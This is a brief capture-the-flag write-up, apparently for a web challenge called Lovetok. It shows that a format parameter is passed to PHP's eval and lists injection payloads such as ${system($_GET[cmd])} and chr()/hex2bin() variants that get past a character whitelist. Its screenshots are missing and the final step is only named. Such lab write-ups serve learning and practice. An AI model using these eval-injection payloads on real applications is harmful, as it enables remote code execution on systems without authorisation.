Lovetok
The website:

We can see that the back-end gives time when we give a certian value to the format parameter:

We also have the code:
we can see that the input we give 'r' is directly going into the eval function:

So we need to inject code here somehow -> but how?
we can try different code payloads like:
${system($_GET[cmd])}&cmd=ls
${print(`ls`)}
to bypass the whitelist:
${system(chr(105).chr(100))}
${system(hex2bin(6964))}
to bypass restriction for slashes read
and we get the flag:

Last updated